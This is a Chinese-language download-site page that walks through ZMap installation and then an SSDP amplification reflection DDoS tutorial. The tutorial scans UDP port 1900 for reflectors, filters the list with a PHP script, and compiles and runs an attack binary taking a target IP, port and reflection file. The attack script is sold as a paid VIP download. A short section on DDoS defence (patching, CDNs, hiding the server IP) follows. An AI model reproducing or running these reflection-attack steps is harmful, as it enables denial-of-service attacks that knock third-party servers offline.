最后编辑:2021-06-05
- 资源介绍
- 更新记录
搬瓦工注册链接:精品稳定服务器购买
ZMap安装
由于系统很多,不同的系统有不同的安装方法,具体如下:
1、Debian 和 Ubuntu 安装命令:
sudo apt install zmap
2、Fedora、 CentOS 和 RHEL 安装命令:
sudo yum install zmap
3、macOS
brew install zmap
4、Arch Linux
sudo pacman -S zmap
| SSDP放大反射攻击扫描教程,放大列表扫描教程!
我用的是centos 64位 先更新系统 yum -y update 区分centos6 centos7 执行不同的命令! Centos 6
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm
centos 7
wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-5.noarch.rpm
sudo rpm -Uvh epel-release-7-5.noarch.rpm
https://dl.fedoraproject.org/pub/epel/7/x86_64/Packages/e/epel-release-7-12.noarch.rpm
安装必要的依赖环境! yum -y install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c cpan vnstat zmap 上传这里的文件到你的机器! 开始扫描SSDP放大列表 screen zmap -M udp -p 1900 --probe-args=file:upnp_1900.pkt -o ssdp.txt 等扫描完成后,我们开始执行过滤! php ssdpfilter.php ssdp.txt ssdpfiltered.txt 200 1000 然后,编译我们的攻击脚本, gcc -pthread ssdp.c -o ssdp ./ssdp <target IP> <target port> <reflection file> <time (optional)> |
SSDP脚本下载:限时?钻石?会员5折优惠,免费更新服务。
特别提示:新手小白慎拍!此服务只包含密钥授权和版本免费更新,不提供任何额外其他服务!
五、总结
DDOS攻击很难通过某一种手段做到完全防御,很多中小型企业,没有能力也没有财力来对抗DDOS攻击。但通过下面的几点,还是可以做到简单的防御:
保证服务器系统的安全
首先要确保服务器软件没有任何漏洞,防止攻击者入侵。确保服务器采用最新系统,并打上安全补丁。在服务器上删除未使用的服务,关闭未使用的端口。对于服务器上运行的网站,确保其打了最新的补丁,没有安全漏洞。
隐藏服务器真实IP
服务器前端加CDN中转(免费的有百度云加速、360网站卫士、加速乐、安全宝等),如果资金充裕的话,可以购买高防的盾机,用于隐藏服务器真实IP,域名解析使用CDN的IP,所有解析的子域名都使用CDN的IP地址。此外,服务器上部署的其他域名也不能使用真实IP解析,全部都使用CDN来解析。
另外,防止服务器对外传送信息泄漏IP,最常见的是,服务器不使用发送邮件功能,如果非要发送邮件,可以通过第三方代理(例如sendcloud)发送,这样对外显示的IP是代理的IP。
总之,只要服务器的真实IP不泄露,10G以下小流量DDOS的预防花不了多少钱,免费的CDN就可以应付得了。如果攻击流量超过20G,那么免费的CDN可能就顶不住了,需要购买一个高防的盾机来应付了,而服务器的真实IP同样需要隐藏。
搬瓦工注册链接:
猜你在找
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 提示下载完但解压或打开不了?
- 找不到素材资源介绍文章里的示例图片?
- 新手须知!包含哪些服务?
- 2021-04-21Hi,初次和大家见面了,请多关照!
